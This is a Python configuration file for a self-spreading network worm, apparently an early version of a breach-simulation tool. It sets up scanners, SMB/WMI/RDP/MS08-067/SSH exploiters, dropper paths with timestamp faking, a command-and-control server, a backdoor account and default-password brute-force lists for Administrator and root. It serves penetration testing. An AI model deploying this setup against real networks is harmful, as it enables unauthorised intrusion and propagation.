2015-08-30 15:27:35 +08:00
|
|
|
import os
|
|
|
|
import sys
|
2015-11-30 16:56:20 +08:00
|
|
|
from network.range import FixedRange
|
2015-09-29 22:55:54 +08:00
|
|
|
from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter
|
|
|
|
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger
|
|
|
|
from abc import ABCMeta
|
|
|
|
import uuid
|
|
|
|
import types
|
2015-11-30 16:56:20 +08:00
|
|
|
|
2015-08-30 15:27:35 +08:00
|
|
|
__author__ = 'itamar'
|
|
|
|
|
2015-09-29 22:55:54 +08:00
|
|
|
GUID = str(uuid.getnode())
|
|
|
|
|
|
|
|
EXTERNAL_CONFIG_FILE = os.path.join(os.path.dirname(sys.argv[0]), 'monkey.bin')
|
|
|
|
|
2015-11-26 21:48:47 +08:00
|
|
|
|
2015-09-29 22:55:54 +08:00
|
|
|
def _cast_by_example(value, example):
|
|
|
|
example_type = type(example)
|
|
|
|
if example_type is str:
|
|
|
|
return str(os.path.expandvars(value))
|
|
|
|
elif example_type is tuple and len(example) != 0:
|
|
|
|
return tuple([_cast_by_example(x, example[0]) for x in value])
|
|
|
|
elif example_type is list and len(example) != 0:
|
|
|
|
return [_cast_by_example(x, example[0]) for x in value]
|
|
|
|
elif example_type is type(value):
|
|
|
|
return value
|
|
|
|
elif example_type is bool:
|
|
|
|
return value.lower() == 'true'
|
|
|
|
elif example_type is int:
|
|
|
|
return int(value)
|
|
|
|
elif example_type is float:
|
|
|
|
return float(value)
|
|
|
|
elif example_type is types.ClassType or example_type is ABCMeta:
|
|
|
|
return globals()[value]
|
|
|
|
else:
|
|
|
|
return None
|
|
|
|
|
2015-11-26 21:48:47 +08:00
|
|
|
|
2015-09-29 22:55:54 +08:00
|
|
|
class Configuration(object):
|
|
|
|
|
|
|
|
def from_dict(self, data):
|
2015-11-26 21:48:47 +08:00
|
|
|
for key, value in data.items():
|
2015-09-29 22:55:54 +08:00
|
|
|
if key.startswith('_'):
|
|
|
|
continue
|
|
|
|
|
|
|
|
try:
|
|
|
|
default_value = getattr(Configuration, key)
|
|
|
|
except AttributeError:
|
2015-11-26 21:48:47 +08:00
|
|
|
raise
|
2015-09-29 22:55:54 +08:00
|
|
|
|
|
|
|
setattr(self, key, _cast_by_example(value, default_value))
|
|
|
|
|
|
|
|
def as_dict(self):
|
|
|
|
result = {}
|
|
|
|
for key in dir(Configuration):
|
|
|
|
if key.startswith('_'):
|
|
|
|
continue
|
|
|
|
try:
|
|
|
|
value = getattr(self, key)
|
|
|
|
except AttributeError:
|
|
|
|
continue
|
|
|
|
|
|
|
|
val_type = type(value)
|
|
|
|
|
|
|
|
if val_type is types.FunctionType or val_type is types.MethodType:
|
|
|
|
continue
|
|
|
|
|
|
|
|
if val_type is types.ClassType or val_type is ABCMeta:
|
|
|
|
value = value.__name__
|
|
|
|
elif val_type is tuple or val_type is list:
|
|
|
|
if len(value) != 0 and type(value[0]) is types.ClassType or type(value[0]) is ABCMeta:
|
|
|
|
value = val_type([x.__name__ for x in value])
|
|
|
|
|
|
|
|
result[key] = value
|
|
|
|
|
|
|
|
return result
|
|
|
|
|
2015-08-30 15:27:35 +08:00
|
|
|
###########################
|
|
|
|
### logging config
|
2015-11-30 16:56:20 +08:00
|
|
|
###########################
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
use_file_logging = True
|
2015-11-26 21:48:47 +08:00
|
|
|
dropper_log_path = os.path.expandvars("%temp%\~df1562.tmp") if sys.platform == "win32" else '/tmp/user-1562'
|
2015-09-29 22:55:54 +08:00
|
|
|
monkey_log_path = os.path.expandvars("%temp%\~df1563.tmp") if sys.platform == "win32" else '/tmp/user-1563'
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
###########################
|
|
|
|
### dropper config
|
|
|
|
###########################
|
|
|
|
|
|
|
|
dropper_try_move_first = sys.argv[0].endswith(".exe")
|
|
|
|
dropper_set_date = True
|
2015-09-29 22:55:54 +08:00
|
|
|
dropper_date_reference_path = r"\windows\system32\kernel32.dll" if sys.platform == "win32" else '/bin/sh'
|
|
|
|
dropper_target_path = r"C:\Windows\monkey.exe"
|
|
|
|
dropper_target_path_linux = '/bin/monkey'
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
###########################
|
|
|
|
### monkey config
|
|
|
|
###########################
|
|
|
|
|
2015-09-30 20:05:30 +08:00
|
|
|
alive = True
|
|
|
|
|
2015-11-26 21:48:47 +08:00
|
|
|
self_delete_in_cleanup = False
|
2015-10-14 22:22:05 +08:00
|
|
|
|
2015-08-30 15:27:35 +08:00
|
|
|
singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
|
|
|
|
|
|
|
|
# how long to wait between scan iterations
|
2015-10-14 22:22:05 +08:00
|
|
|
timeout_between_iterations = 300
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
# how many scan iterations to perform on each run
|
2015-10-08 18:30:36 +08:00
|
|
|
max_iterations = 3
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
scanner_class = TcpScanner
|
2015-10-14 22:22:05 +08:00
|
|
|
finger_classes = (SMBFinger, SSHFinger, PingScanner)
|
|
|
|
exploiter_classes = (SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, SSHExploiter)
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
# how many victims to look for in a single scan iteration
|
|
|
|
victims_max_find = 14
|
|
|
|
|
|
|
|
# how many victims to exploit before stopping
|
|
|
|
victims_max_exploit = 7
|
|
|
|
|
2015-09-29 22:55:54 +08:00
|
|
|
current_server = ""
|
|
|
|
|
|
|
|
command_servers = ["russian-mail-brides.com:5000"]
|
|
|
|
|
2015-10-14 22:22:05 +08:00
|
|
|
serialize_config = False
|
|
|
|
|
|
|
|
retry_failed_explotation = True
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
###########################
|
|
|
|
### scanners config
|
|
|
|
###########################
|
|
|
|
|
|
|
|
|
|
|
|
#range_class = RelativeRange
|
2015-09-29 22:55:54 +08:00
|
|
|
range_size = 8
|
2015-09-30 20:05:30 +08:00
|
|
|
range_class = FixedRange
|
2015-11-26 21:48:47 +08:00
|
|
|
range_fixed = ("10.0.1.39", )
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
# TCP Scanner
|
2015-10-14 22:22:05 +08:00
|
|
|
tcp_target_ports = [22, 2222, 445, 135, 3389]
|
2015-10-08 18:30:36 +08:00
|
|
|
tcp_scan_timeout = 3000 # 3000 Milliseconds
|
2015-08-30 15:27:35 +08:00
|
|
|
tcp_scan_interval = 200
|
2015-09-29 22:55:54 +08:00
|
|
|
tcp_scan_get_banner = True
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
# Ping Scanner
|
|
|
|
ping_scan_timeout = 1000
|
|
|
|
|
|
|
|
###########################
|
|
|
|
### exploiters config
|
|
|
|
###########################
|
|
|
|
|
|
|
|
skip_exploit_if_file_exist = True
|
|
|
|
|
|
|
|
ms08_067_exploit_attempts = 5
|
|
|
|
ms08_067_remote_user_add = "IUSER_SUPPORT"
|
|
|
|
ms08_067_remote_user_pass = "Password1!"
|
|
|
|
|
|
|
|
# psexec exploiter
|
|
|
|
psexec_user = "Administrator"
|
2015-11-26 21:48:47 +08:00
|
|
|
psexec_passwords = ["Password1!", "1234", "password", "12345678"]
|
2015-09-29 22:55:54 +08:00
|
|
|
|
|
|
|
#ssh exploiter
|
|
|
|
ssh_user = "root"
|
|
|
|
ssh_passwords = ["root", "toor", "1234", "12345678"]
|
|
|
|
|
2015-09-30 20:05:30 +08:00
|
|
|
#rdp exploiter
|
|
|
|
rdp_use_vbs_download = True
|
2015-09-29 22:55:54 +08:00
|
|
|
|
2015-11-26 21:48:47 +08:00
|
|
|
WormConfiguration = Configuration()
|